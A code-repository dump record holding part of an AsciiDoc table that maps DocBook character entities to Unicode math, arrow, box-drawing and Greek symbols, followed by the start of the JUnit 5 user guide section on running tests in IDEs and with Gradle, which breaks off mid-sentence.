options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| | |\n|====\n\n\n=== General Technical Character Entities (%isotech;)\nGeneral Technical Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| | |\n|====\n\n\n","old_contents":"== DocBook Character Entity Reference\n\nThese symbols where extrated from http:\/\/www.oasis-open.org\/docbook\/documentation\/reference\/html\/refchar.html.\n\nThis document was made to show how to write symbols with asciidoc.\nIt was also made to compile with 
dblatex. For example, since the \n`ℜ` doesn't compile with dblatex it will be here \nlike this: `& real;`. But if you are going to use in html or fop, you\ncan use `ℜ`.\n\nYou can see the code for \nhttps:\/\/raw.githubusercontent.com\/edusantana\/novo-livro\/master\/livro\/capitulos\/symbols.adoc[this document here].\n\n=== Added Math Symbols: Arrow Relations Character Entities (%isoamsa;)\n\nhttp:\/\/www.oasis-open.org\/docbook\/documentation\/reference\/html\/iso-amsb.html[Added Math Symbols: Arrow Relations Character Entities]\n\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| & amalg; | | amalgamation or coproduct\n| & Barwed; | ⊼ | Nand\n| ⌅ | ⊼ | Nand\n| ⋒ | ⋒ | Double intersection\n| ⋓ | ⋓ | Double union\n| ⋎ | ⋎ | Curly logical or\n| ⋏ | ⋏ | Curly logical and\n| ⋄ | ⋄ | Diamond operator\n| ⋇ | ⋇ | Division times\n| ⊺ | ⊺ | Intercalate\n| ⋋ | ⋋ | Left semidirect product\n| ⋉ | ⋉ | Left normal factor semidirect product\n| ⊟ | ⊟ | Squared minus\n| ⊛ | ⊛ | Circled asterisk operator\n| ⊚ | ⊚ | Circled ring operator\n| ⊝ | ⊝ | Circled dash\n| ⊙ | ⊙ | Circled dot operator\n| ⊖ | ⊖ | Circled minus\n| ⊕ | ⊕ | Circled plus\n| ⊘ | ⊘ | Circled division slash\n\n| ⊗ | ⊗ | Circled times\n| ⊞ | ⊞ | Squared plus\n| ∔ | ∔ | Dot plus\n| ⋌ | ⋌ | Right semidirect product\n| ⋊ | ⋊ | Right normal factor semidirect product\n| ⋅ | ⋅ | Dot operator\n| ⊡ | ⊡ | Squared dot operator\n| ∖ | ∖ | Set minus\n| ⊓ | ⊓ | Square cap\n| ⊔ | ⊔ | Square cup\n\n| & ssetmn; | | sm reverse solidus\n| ⋆ | ⋆ | Star operator\n| ⊠ | ⊠ | Squared times\n| ⊤ | ⊤ | Down tack\n| ⊎ | ⊎ | Multiset union\n| ≀ | ≀ | Wreath product\n| ◯ | ◯ | Large circle\n| ▽ | ▽ | White down-pointing triangle\n| △ | △ | White up-pointing triangle\n| ∐ | ∐ | N-ary coproduct\n\n| ∏ | ∏ | N-ary product\n| ∑ | ∑ | N-ary summation\n\n|====\n\n\n=== Added Math Symbols: Binary Operators Character Entities (%isoamsb;)\n\nhttp:\/\/www.oasis-open.org\/docbook\/documentation\/reference\/html\/iso-amsa.html[Added Math Symbols: Binary Operators Character Entities]\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n\n| ↶ | ↶ | Anticlockwise top semicircle arrow\n| ↷ | ↷ | Clockwise top semicircle arrow\n| ⇓ | ⇓ | Downwards double arrow\n| &darr2; | ⇊ | Downwards paired arrows\n| ⇃ | ⇃ | Downwards harpoon with barb leftwards\n| ⇂ | ⇂ | Downwards harpoon with barb rightwards\n| ⇚ | ⇚ | Leftwards triple arrow\n| ↞ | ↞ | Leftwards two headed arrow\n| &larr2; | ⇇ | Leftwards paired arrows\n| ↩ | ↩ | Leftwards arrow with hook\n| ↫ | ↫ | Leftwards arrow with loop\n| ↢ | ↢ | Leftwards arrow with tail\n| ↽ | ↽ | Leftwards harpoon with barb downwards\n| ↼ | ↼ | Leftwards harpoon with barb upwards\n| ⇔ | ⇔ | Left right double arrow\n| ↔ | ↔ | Left right arrow\n| &lrarr2; | ⇆ | Leftwards arrow over rightwards arrow\n| &rlarr2; | ⇄ | Rightwards arrow over leftwards arrow\n| ↭ | ↭ | Left right wave arrow\n| &rlhar2; | ⇌ | Rightwards harpoon over leftwards harpoon\n| &lrhar2; | ⇋ | Leftwards harpoon over rightwards harpoon\n| ↰ | ↰ | Upwards arrow with tip leftwards\n| ↦ | ↦ | Rightwards arrow from bar\n| ⊸ | ⊸ | Multimap\n| ↗ | ↗ | North east arrow\n| ⇍ | ⇍ | Leftwards double arrow with stroke\n| ↚ | ↚ | Leftwards arrow with stroke\n| ⇎ | ⇎ | Left right double arrow with stroke\n| ↮ | ↮ | Left right arrow with stroke\n| ↛ | ↛ | Rightwards arrow with stroke\n| ⇏ | ⇏ | Rightwards double arrow with stroke\n| ↖ | ↖ | North west arrow\n| ↺ | ↺ 
| Anticlockwise open circle arrow\n| ↻ | ↻ | Clockwise open circle arrow\n| ⇛ | ⇛ | Rightwards triple arrow\n| ↠ | ↠ | Rightwards two headed arrow\n| &rarr2; | ⇉ | Rightwards paired arrows\n| ↪ | ↪ | Rightwards arrow with hook\n| ↬ | ↬ | Rightwards arrow with loop\n| ↣ | ↣ | Rightwards arrow with tail\n| & rarrw; | ⇝ | Rightwards squiggle arrow\n| ⇁ | ⇁ | Rightwards harpoon with barb downwards\n| ⇀ | ⇀ | Rightwards harpoon with barb upwards\n| ↱ | ↱ | Upwards arrow with tip rightwards\n| &drarr; | ↘ | South east arrow\n| &dlarr; | ↙ | South west arrow\n| ⇑ | ⇑ | Upwards double arrow\n| &uarr2; | ⇈ | Upwards paired arrows\n| ⇕ | ⇕ | Up down double arrow\n| ↕ | ↕ | Up down arrow\n| ↿ | ↿ | Upwards harpoon with barb leftwards\n| ↾ | ↾ | Upwards harpoon with barb rightwards\n| & xlArr; | | long l dbl arrow \n| & xhArr; | | long l&r dbl arr\n| & xharr; | | long l&r arr \n| & xrArr; | | long rt dbl arr \n\n\n|====\n\n=== Added Math Symbols: Delimiters Character Entities (%isoamsc;)\n\nhttp:\/\/www.oasis-open.org\/docbook\/documentation\/reference\/html\/iso-amsc.html[Added Math Symbols: Delimiters Character Entities]\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| ⌉ | ⌉ | Right ceiling\n| ⌋ | ⌋ | Right floor\n| & rpargt; | | right paren, gt\n| ⌝ | ⌝ | Top right corner\n| ⌟ | ⌟ | Bottom right corner\n| ⌈ | ⌈ | Left ceiling\n| ⌊ | ⌊ | Left floor\n| & lpargt; | | left parenthesis, gt\n| ⌜ | ⌜ | Top left corner\n| ⌞ | ⌞ | Bottom left corner\n|====\n\n=== Added Math Symbols: Negated Relations Character Entities (%isoamsn;)\n\nhttp:\/\/www.oasis-open.org\/docbook\/documentation\/reference\/html\/iso-amsn.html[Added Math Symbols: Negated Relations Character Entities]\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| ⪊ | | greater, not approximate\n| ⪈ | ≩ | Greater-than but not equal to\n| ≩ | ≩ | Greater-than but not equal to\n| ⋧ | ⋧ | Greater-than but not equivalent to\n| ≩︀ | | gt, vert, not dbl eq\n| ⪉ | | less, not approximate\n| ≨ | ≨ | Less-than but not equal to\n| ⪇ | ≨ | Less-than but not equal to\n| ⋦ | ⋦ | Less-than but not equivalent to\n| ≨︀ | | less, vert, not dbl eq\n| ≉ | ≉ | Not almost equal to\n| ≇ | ≇ | Neither approximately nor actually equal to\n| ≢ | ≢ | Not identical to\n| ≧̸ | ≱ | Neither greater-than nor equal to\n| ≱ | | not greater-than-or-equal\n| ⩾̸ | ≱ | Neither greater-than nor equal to\n| ≯ | ≯ | Not greater-than\n| ≰ | | not less-than-or-equal\n| ≦̸ | ≰ | Neither less-than nor equal to\n| ⩽̸ | ≰ | Neither less-than nor equal to\n| ≮ | ≮ | Not less-than\n| ⋪ | ⋪ | Not normal subgroup of\n| ⋬ | ⋬ | Not normal subgroup of or equal to\n| ∤ | ∤ | Does not divide\n| ∦ | ∦ | Not parallel to\n| ⊀ | ⊀ | Does not precede\n| ⪯̸ | | not precedes, equals\n| ⋫ | ⋫ | Does not contain as normal subgroup of\n| ⋭ | ⋭ | Does not contain as normal subgroup or equal\n| ⊁ | ⊁ | Does not succeed\n| ⪰̸ | | not succeeds, equals\n| ≁ | ≁ | Not tilde\n| ≄ | ≄ | Not asymptotically equal to\n| ∤ | | nshortmid\n| ∦ | | not short par\n| ⊄ | ⊄ | Not a subset of\n| ⊈ | ⊈ | Neither a subset of nor equal to\n| ⫅̸ | ⊈ | Neither a subset of nor equal to\n| ⊅ | ⊅ | Not a superset of\n| ⫆̸ | ⊉ | Neither a superset of nor equal to\n| ⊉ | ⊉ | Neither a superset of nor equal to\n| ⊬ | ⊬ | Does not prove\n| ⊭ | ⊭ | Not true\n| ⊯ | ⊯ | Negated double vertical bar double right turnstile\n| ⊮ | ⊮ | Does not force\n| & prnap; | & #x22E8; | Precedes but not equivalent 
to\n| ⪵ | | precedes, not dbl eq\n| & prnsim; | & #x22E8; | Precedes but not equivalent to\n| ⪺ | ⋩ | Succeed but not equivalent to\n| ⪶ | | succeeds, not dbl eq\n| ⋩ | ⋩ | Succeed but not equivalent to\n| ⊊ | ⊊ | Subset of or not equal to\n| ⫋ | ⊊ | Subset of or not equal to\n| ⊋ | ⊋ | Superset of or not equal to\n| ⫌ | ⊋ | Superset of or not equal to\n| ⫋︀ | | subset not dbl eq, var\n| ⊊︀ | | subset, not eq, var\n| ⊋︀ | | superset, not eq, var\n| ⫌︀ | | super not dbl eq, var\n\n|====\n\n=== Added Math Symbols: Ordinary Character Entities (%isoamso;)\n\nhttp:\/\/www.oasis-open.org\/docbook\/documentation\/reference\/html\/iso-amso.html[Added Math Symbols: Ordinary Character Entities]\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| ∠ | ∠ | Angle\n| ∡ | ∡ | Measured angle\n| ℶ | ℶ | Bet symbol\n| ‵ | ‵ | Reversed prime\n| ∁ | ∁ | Complement\n| ℸ | ℸ | Dalet symbol\n| ℓ | ℓ | Script small l\n| ∅ | | emptyset \/varnothing =small o, slash\n| ℷ | ℷ | Gimel symbol\n| ℑ | ℑ | Fraktur letter capital i\n| ı | ı | Latin small letter dotless i\n| & jnodot; | | jmath - small j, no dot\n| ∄ | ∄ | There does not exist\n| Ⓢ | Ⓢ | Circled latin capital letter S\n| ℏ | ħ | Latin small letter h with stroke\n| ℜ | ℜ | Fraktur letter capital r\n| &sbsol; | | sbs - short reverse solidus\n| &vprime; | ′ | Prime\n| ℘ | ℘ | Script capital p\n\n|====\n\n=== Added Math Symbols: Relations Character Entities (%isoamsr;)\nAdded Math Symbols: Relations Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| ≊ | ≊ | Almost equal or equal to\n| ≈ | ≍ | Equivalent to\n| & bcong; | & #x224C; | All equal to\n| ϶ | | such that\n| ⋈ | ⋈ | Bowtie\n| ∽ | ∽ | Reversed tilde\n| ⋍ | ⋍ | Reversed tilde equals\n| ≎ | ≎ | Geometrically equivalent to\n| ≏ | ≏ | Difference between\n| ≗ | ≗ | Ring equal to\n| ≔ | ≔ | Colon equals\n| ⋞ | ⋞ | Equal to or precedes\n| ⋟ | ⋟ | Equal to or succeeds\n| &cupre; | ≼ | Precedes or equal to\n| ⊣ | ⊣ | Left tack\n| ≖ | ≖ | Ring in equal to\n| ≕ | ≕ | Equals colon\n| ≑ | ≑ | Geometrically equal to\n| ≐ | ≐ | Approaches the limit\n| ≒ | ≒ | Approximately equal to or the image of\n| ⪖ | ⋝ | Equal to or greater-than\n| ⪕ | ⋜ | Equal to or less-than\n| ≓ | ≓ | Image of or approximately equal to\n| ⋔ | ⋔ | Pitchfork\n| ⌢ | ⌢ | Frown\n| & gap; | & #x2273; | Greater-than or equivalent to\n| &gsdot; | ⋗ | Greater-than with dot\n| ≧ | ≧ | Greater-than over equal to\n| ⋛ | ⋛ | Greater-than equal to or less-than\n| ⪌ | ⋛ | Greater-than equal to or less-than\n| ⩾ | | gt-or-equal, slanted\n| & Gg; | & #x22D9; | Very much greater-than\n| ≷ | ≷ | Greater-than or less-than\n| & gsim; | & #x2273; | Greater-than or equivalent to\n| ≫ | ≫ | Much greater-than\n| & lap; | & #x2272; | Less-than or equivalent to\n| &ldot; | ⋖ | Less-than with dot\n| ≦ | ≦ | Less-than over equal to\n| ⪋ | ⋚ | Less-than equal to or greater-than\n| ⋚ | ⋚ | Less-than equal to or greater-than\n| ⩽ | | less-than-or-eq, slant\n| ≶ | ≶ | Less-than or greater-than\n| & Ll; | & #x22D8; | Very much less-than\n| & lsim; | & #x2272; | Less-than or equivalent to\n| & Lt; | & #x226A; | Much less-than\n| ⊴ | ⊴ | Normal subgroup of or equal to\n| ∣ | ∣ | Divides\n| & models; | & #x22A7; | Models\n| ≺ | ≺ | Precedes\n| ⪷ | ≾ | Precedes or equivalent to\n| ⪯ | | precedes, equals\n| ≾ | ≾ | Precedes or equivalent to\n| ⊵ | ⊵ | Contains as normal subgroup or equal to\n| &samalg; | ∐ | N-ary coproduct\n| 
≻ | ≻ | Succeeds\n| ⪸ | ≿ | Succeeds or equivalent to\n| ≽ | ≽ | Succeeds or equal to\n| ⪰ | ≽ | Succeeds or equal to\n| ≿ | ≿ | Succeeds or equivalent to\n| ⌢ | | small down curve\n| ∣ | | \u00a0\n| ⌣ | ⌣ | Smile\n| ∥ | | short parallel\n| ⊏ | ⊏ | Square image of\n| ⊑ | ⊑ | Square image of or equal to\n| ⊐ | ⊐ | Square original of\n| ⊒ | ⊒ | Square original of or equal to\n| ⌣ | | small up curve\n| ⋐ | ⋐ | Double subset\n| ⫅ | ⊆ | Subset of or equal to\n| ⋑ | ⋑ | Double superset\n| ⫆ | ⊇ | Superset of or equal to\n| ≈ | | thick approximate\n| ∼ | | thick similar\n| ≜ | ≜ | Delta equal to\n| ≬ | ≬ | Between\n| ⊢ | ⊢ | Right tack\n| ⊩ | ⊩ | Forces\n| & vDash; | & #x22A8; | True\n| ⊻ | ⊻ | Xor\n| ⊲ | ⊲ | Normal subgroup of\n| ∝ | ∝ | Proportional to\n| ⊳ | ⊳ | Contains as normal subgroup\n| ⊪ | ⊪ | Triple vertical bar right turnstile\n\n|====\n\n\n=== Box and Line Drawing Character Entities (%isobox;)\nBox and Line Drawing Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| ─ | ─ | Box drawings light horizontal\n| │ | │ | Box drawings light vertical\n| └ | └ | Box drawings light up and right\n| ┘ | ┘ | Box drawings light up and left\n| ┐ | ┐ | Box drawings light down and left\n| ┌ | ┌ | Box drawings light down and right\n| ├ | ├ | Box drawings light vertical and right\n| ┴ | ┴ | Box drawings light up and horizontal\n| ┤ | ┤ | Box drawings light vertical and left\n| ┬ | ┬ | Box drawings light down and horizontal\n| ┼ | ┼ | Box drawings light vertical and horizontal\n| ╞ | ╞ | Box drawings vertical single and right double\n| ╨ | ╨ | Box drawings up double and horizontal single\n| ╡ | ╡ | Box drawings vertical single and left double\n| ╥ | ╥ | Box drawings down double and horizontal single\n| ╪ | ╪ | Box drawings vertical single and horizontal double\n| ═ | ═ | Box drawings double horizontal\n| ║ | ║ | Box drawings double vertical\n| ╚ | ╚ | Box drawings double up and right\n| ╝ | ╝ | Box drawings double up and left\n| ╗ | ╗ | Box drawings double down and left\n| ╔ | ╔ | Box drawings double down and right\n| ╠ | ╠ | Box drawings double vertical and right\n| ╩ | ╩ | Box drawings double up and horizontal\n| ╣ | ╣ | Box drawings double vertical and left\n| ╦ | ╦ | Box drawings double down and horizontal\n| ╬ | ╬ | Box drawings double vertical and horizontal\n| ╟ | ╟ | Box drawings vertical double and right single\n| ╧ | ╧ | Box drawings up single and horizontal double\n| ╢ | ╢ | Box drawings vertical double and left single\n| ╤ | ╤ | Box drawings down single and horizontal double\n| ╫ | ╫ | Box drawings vertical double and horizontal single\n| ╘ | ╘ | Box drawings up single and right double\n| ╜ | ╜ | Box drawings up double and left single\n| ╕ | ╕ | Box drawings down single and left double\n| ╓ | ╓ | Box drawings down double and right single\n| ╙ | ╙ | Box drawings up double and right single\n| ╛ | ╛ | Box drawings up single and left double\n| ╖ | ╖ | Box drawings down double and left single\n| ╒ | ╒ | Box drawings down single and right double\n\n|====\n\n\n=== Russian Cyrillic Character Entities (%isocyr1;)\nRussian Cyrillic Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| | |\n|====\n\n\n=== Non-Russian Cyrillic Character Entities (%isocyr2;)\nNon-Russian Cyrillic Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| | 
|\n|====\n\n\n=== Diacritical Marks Character Entities (%isodia;)\nDiacritical Marks Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| | |\n|====\n\n\n=== Greek Letters Character Entities (%isogrk1;)\nGreek Letters Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| | |\n|====\n\n\n=== Monotoniko Greek Character Entities (%isogrk2;)\nMonotoniko Greek Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| &agr; | α | Greek small letter alpha\n| &Agr; | Α | Greek capital letter ALPHA\n| &bgr; | β | Greek small letter beta\n| &Bgr; | Β | Greek capital letter BETA\n| &ggr; | γ | Greek small letter gamma\n| &Ggr; | Γ | Greek capital letter GAMMA\n| &dgr; | δ | Greek small letter delta\n| &Dgr; | Δ | Greek capital letter DELTA\n| & egr; | & #x03B5; | Greek small letter epsilon\n| & Egr; | & #x395; | Greek capital letter EPSILON\n| &zgr; | ζ | Greek small letter zeta\n| &Zgr; | Ζ | Greek capital letter ZETA\n| &eegr; | η | Greek small letter eta\n| &EEgr; | Η | Greek capital letter ETA\n| & thgr; | & #x03B8; | Greek small letter theta\n| &THgr; | Θ | Greek capital letter THETA\n| &igr; | ι | Greek small letter iota\n| &Igr; | Ι | Greek capital letter IOTA\n| &kgr; | κ | Greek small letter kappa\n| &Kgr; | Κ | Greek capital letter KAPPA\n| &lgr; | λ | Greek small letter lamda\n| &Lgr; | Λ | Greek capital letter LAMDA\n| &mgr; | μ | Greek small letter mu\n| &Mgr; | Μ | Greek capital letter MU\n| &ngr; | ν | Greek small letter nu\n| &Ngr; | Ν | Greek capital letter NU\n| &xgr; | ξ | Greek small letter xi\n| &Xgr; | Ξ | Greek capital letter XI\n| &ogr; | ο | Greek small letter omicron\n| &Ogr; | Ο | Greek capital letter OMICRON\n| &pgr; | π | Greek small letter pi\n| &Pgr; | Π | Greek capital letter PI\n| &rgr; | ρ | Greek small letter rho\n| &Rgr; | Ρ | Greek capital letter RHO\n| &sgr; | σ | Greek small letter sigma\n| &Sgr; | Σ | Greek capital letter SIGMA\n| &sfgr; | ς | Greek small letter final sigma\n| &tgr; | τ | Greek small letter tau\n| & Tgr; | & #x03A4; | Greek capital letter TAU\n| &ugr; | υ | Greek small letter upsilon\n| &Ugr; | Υ | Greek capital letter UPSILON\n| &phgr; | φ | Greek small letter phi\n| &PHgr; | Φ | Greek capital letter PHI\n| &khgr; | χ | Greek small letter chi\n| &KHgr; | Χ | Greek capital letter CHI\n| &psgr; | ψ | Greek small letter psi\n| &PSgr; | Ψ | Greek capital letter PSI\n| &ohgr; | ω | Greek small letter omega\n| &OHgr; | Ω | Greek capital letter OMEGA\n|====\n\n\n=== Greek Symbols Character Entities (%isogrk3;)\nGreek Symbols Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| α | α | Greek small letter alpha\n| β | β | Greek small letter beta\n| γ | γ | Greek small letter gamma\n| Γ | Γ | Greek capital letter GAMMA\n| ϝ | Ϝ | Greek letter digamma\n| δ | δ | Greek small letter delta\n| Δ | Δ | Greek capital letter DELTA\n| ε | ε | Greek small letter epsilon\n| & epsiv; | & #x025B; | Latin small letter open e\n| & epsis; | & #x03B5; | Greek small letter epsilon\n| ζ | ζ | Greek small letter zeta\n| η | η | Greek small letter eta\n| & thetas; | & #x03B8; | Greek small letter theta\n| Θ | Θ | Greek capital letter THETA\n| & thetav; | & #x03D1; | Greek theta symbol\n| ι | ι | Greek small letter iota\n| κ | κ | 
Greek small letter kappa\n| ϰ | ϰ | Greek kappa symbol\n| λ | λ | Greek small letter lamda\n| Λ | Λ | Greek capital letter LAMDA\n| μ | μ | Greek small letter mu\n| ν | ν | Greek small letter nu\n| ξ | ξ | Greek small letter xi\n| Ξ | Ξ | Greek capital letter XI\n| π | π | Greek small letter pi\n| ϖ | ϖ | Greek omega symbol\n| Π | Π | Greek capital letter PI\n| ρ | ρ | Greek small letter rho\n| ϱ | ϱ | Greek rho symbol\n| σ | σ | Greek small letter sigma\n| Σ | Σ | Greek capital letter SIGMA\n| ς | ς | Greek small letter final sigma\n| τ | τ | Greek small letter tau\n| υ | υ | Greek small letter upsilon\n| ϒ | ϒ | Greek upsilon with hook symbol\n| &phis; | φ | Greek small letter phi\n| Φ | Φ | Greek capital letter PHI\n| ϕ | ϕ | Greek phi symbol\n| χ | χ | Greek small letter chi\n| ψ | ψ | Greek small letter psi\n| Ψ | Ψ | Greek capital letter PSI\n| ω | ω | Greek small letter omega\n| Ω | Ω | Greek capital letter OMEGA\n|====\n\n\n=== Alternative Greek Symbols Character Entities (%isogrk4;)\nAlternative Greek Symbols Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| | |\n|====\n\n\n=== ISO Latin 1 Character Entities (%isolat1;)\nISO Latin 1 Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| | |\n|====\n\n\n=== Added Latin 2 Character Entities (%isolat2;)\nAdded Latin 2 Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| | |\n|====\n\n\n=== Numeric and Special Graphic Character Entities (%isonum;)\nNumeric and Special Graphic Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| | |\n|====\n\n\n=== Publishing Character Entities (%isopub;)\nPublishing Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| | |\n|====\n\n\n=== General Technical Character Entities (%isotech;)\nGeneral Technical Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| | |\n|====\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"f652508bb7f619c77516d3bf62cc7920b0822893","subject":"Revise documentation on Maven support","message":"Revise documentation on Maven support\n\n - Clarify that `junit-platform-surefire-provider` will be removed in\n Platform 1.4.\n - Remove `junit-platform-surefire-provider` from all samples.\n - Move the engine dependencies to the regular dependencies in all\n samples.\n\nResolves #1535.\n","repos":"junit-team\/junit-lambda,sbrannen\/junit-lambda","old_file":"documentation\/src\/docs\/asciidoc\/user-guide\/running-tests.adoc","new_file":"documentation\/src\/docs\/asciidoc\/user-guide\/running-tests.adoc","new_contents":"[[running-tests]]\n== Running Tests\n\n[[running-tests-ide]]\n=== IDE Support\n\n[[running-tests-ide-intellij-idea]]\n==== IntelliJ IDEA\n\nIntelliJ IDEA supports running tests on the JUnit Platform since version 2016.2. For\ndetails please see the\nhttps:\/\/blog.jetbrains.com\/idea\/2016\/08\/using-junit-5-in-intellij-idea\/[post on the\nIntelliJ IDEA blog]. 
Note, however, that it is recommended to use IDEA 2017.3 or newer\nsince these newer versions of IDEA will download the following JARs automatically based\non the API version used in the project: `junit-platform-launcher`,\n`junit-jupiter-engine`, and `junit-vintage-engine`.\n\nWARNING: IntelliJ IDEA releases prior to IDEA 2017.3 bundle specific versions of JUnit 5.\nThus, if you want to use a newer version of JUnit Jupiter, execution of tests within the\nIDE might fail due to version conflicts. In such cases, please follow the instructions\nbelow to use a newer version of JUnit 5 than the one bundled with IntelliJ IDEA.\n\nIn order to use a different JUnit 5 version (e.g., {jupiter-version}), you may need to\ninclude the corresponding versions of the `junit-platform-launcher`,\n`junit-jupiter-engine`, and `junit-vintage-engine` JARs in the classpath.\n\n.Additional Gradle Dependencies\n[source,groovy]\n[subs=attributes+]\n----\n\/\/ Only needed to run tests in a version of IntelliJ IDEA that bundles older versions\ntestRuntime(\"org.junit.platform:junit-platform-launcher:{platform-version}\")\ntestRuntime(\"org.junit.jupiter:junit-jupiter-engine:{jupiter-version}\")\ntestRuntime(\"org.junit.vintage:junit-vintage-engine:{vintage-version}\")\n----\n\n.Additional Maven Dependencies\n[source,xml]\n[subs=attributes+]\n----\n<!-- Only needed to run tests in a version of IntelliJ IDEA that bundles older versions -->\n<dependency>\n\t<groupId>org.junit.platform<\/groupId>\n\t<artifactId>junit-platform-launcher<\/artifactId>\n\t<version>{platform-version}<\/version>\n\t<scope>test<\/scope>\n<\/dependency>\n<dependency>\n\t<groupId>org.junit.jupiter<\/groupId>\n\t<artifactId>junit-jupiter-engine<\/artifactId>\n\t<version>{jupiter-version}<\/version>\n\t<scope>test<\/scope>\n<\/dependency>\n<dependency>\n\t<groupId>org.junit.vintage<\/groupId>\n\t<artifactId>junit-vintage-engine<\/artifactId>\n\t<version>{vintage-version}<\/version>\n\t<scope>test<\/scope>\n<\/dependency>\n----\n\n[[running-tests-ide-eclipse]]\n==== Eclipse\n\nEclipse IDE offers support for the JUnit Platform since the Eclipse Oxygen.1a (4.7.1a)\nrelease.\n\nFor more information on using JUnit 5 in Eclipse consult the official _Eclipse support\nfor JUnit 5_ section of the\nhttps:\/\/www.eclipse.org\/eclipse\/news\/4.7.1a\/#junit-5-support[Eclipse Project Oxygen.1a\n(4.7.1a) - New and Noteworthy] documentation.\n\n[[running-tests-ide-other]]\n==== Other IDEs\n\nAt the time of this writing, there is no direct support for running tests on the JUnit\nPlatform within IDEs other than IntelliJ IDEA and Eclipse. However, the JUnit team\nprovides two intermediate solutions so that you can go ahead and try out JUnit 5 within\nyour IDE today. You can use the <<running-tests-console-launcher>> manually or execute\ntests with a <<running-tests-junit-platform-runner,JUnit 4 based Runner>>.\n\n[[running-tests-build]]\n=== Build Support\n\n[[running-tests-build-gradle]]\n==== Gradle\n\nStarting with https:\/\/docs.gradle.org\/4.6\/release-notes.html[version 4.6], Gradle provides\nhttps:\/\/docs.gradle.org\/current\/userguide\/java_testing.html#using_junit5[native support]\nfor executing tests on the JUnit Platform. 
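As a quick overview before the individual pieces, a minimal, self-contained `build.gradle` for JUnit Jupiter tests might look like the sketch below; the `java` plugin and `mavenCentral()` repository declarations are assumptions about a typical project.\n\n[source,java,indent=0]\n[subs=attributes+]\n----\nplugins {\n\tid 'java'\n}\n\nrepositories {\n\tmavenCentral()\n}\n\ndependencies {\n\t\/\/ API for writing JUnit Jupiter tests\n\ttestCompile(\"org.junit.jupiter:junit-jupiter-api:{jupiter-version}\")\n\t\/\/ TestEngine implementation that executes them\n\ttestRuntime(\"org.junit.jupiter:junit-jupiter-engine:{jupiter-version}\")\n}\n\ntest {\n\t\/\/ run tests on the JUnit Platform\n\tuseJUnitPlatform()\n}\n----\n\n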
To enable it, you just need to specify\n`useJUnitPlatform()` within a `test` task declaration in `build.gradle`:\n\n[source,java,indent=0]\n[subs=attributes+]\n----\ntest {\n useJUnitPlatform()\n}\n----\n\nFiltering by tags or engines is also supported:\n\n[source,java,indent=0]\n[subs=attributes+]\n----\ntest {\n useJUnitPlatform {\n includeTags 'fast', 'smoke & feature-a'\n \/\/ excludeTags 'slow', 'ci'\n includeEngines 'junit-jupiter'\n \/\/ excludeEngines 'junit-vintage'\n\t}\n}\n----\n\nPlease refer to the\nhttps:\/\/docs.gradle.org\/current\/userguide\/java_plugin.html#sec:java_test[official Gradle documentation]\nfor a comprehensive list of options.\n\n[WARNING]\n.The JUnit Platform Gradle Plugin has been discontinued\n====\nThe very basic `junit-platform-gradle-plugin` developed by the JUnit team was deprecated\nin JUnit Platform 1.2 and discontinued in 1.3. Please switch to Gradle's standard `test`\ntask.\n====\n\n[[running-tests-build-gradle-config-params]]\n===== Configuration Parameters\n\nThe standard Gradle `test` task currently does not provide a dedicated DSL to set JUnit\nPlatform <<running-tests-config-params, configuration parameters>> to influence test\ndiscovery and execution. However, you can provide configuration parameters within the\nbuild script via system properties (as shown below) or via the\n`junit-platform.properties` file.\n\n[source,java,indent=0]\n----\ntest {\n\t\/\/ ...\n\tsystemProperty 'junit.jupiter.conditions.deactivate', '*'\n\tsystemProperties = [\n\t\t'junit.jupiter.extensions.autodetection.enabled': 'true',\n\t\t'junit.jupiter.testinstance.lifecycle.default': 'per_class'\n\t]\n\t\/\/ ...\n}\n----\n\n[[running-tests-build-gradle-engines-configure]]\n===== Configuring Test Engines\n\nIn order to run any tests at all, a 